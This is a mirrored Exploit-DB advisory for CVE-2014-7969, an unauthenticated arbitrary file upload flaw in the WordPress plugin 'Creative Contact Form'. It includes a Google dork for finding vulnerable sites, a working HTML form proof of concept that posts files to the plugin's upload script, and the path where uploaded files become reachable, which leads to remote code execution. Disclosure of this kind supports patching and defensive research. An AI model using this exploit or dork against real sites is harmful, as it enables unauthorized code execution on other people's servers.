bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/34922.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

37 lines
No EOL
1.3 KiB
Text
Raw Blame History

==========================================================
"Creative Contact Form - The Best WordPress Contact Form Builder" -
Arbitrary File Upload
# Author: Gianni Angelozzi
# Date: 08/10/2014
# Remote: Yes
# Vendor Homepage: https://profiles.wordpress.org/creative-solutions-1/
# Software Link: https://wordpress.org/plugins/sexy-contact-form/
# CVE: CVE-2014-7969
# Version: all including latest 0.9.7
# Google Dork: inurl:"wp-content/plugins/sexy-contact-form"
This plugin includes a PHP script to accept file uploads that doesn't
perform any security check, thus allowing unauthenticated remote file
upload, leading to remote code execution. All versions are affected.
Uploaded files are stored with their original file name.
==========================================================
PoC
==========================================================
Trigger a file upload
<form method="POST" action="
http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Then the file is accessible under
http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/files/FILENAME
==========================================================
EOF
Thanks,
Gianni Angelozzi
Reference in a new issue View git blame Copy permalink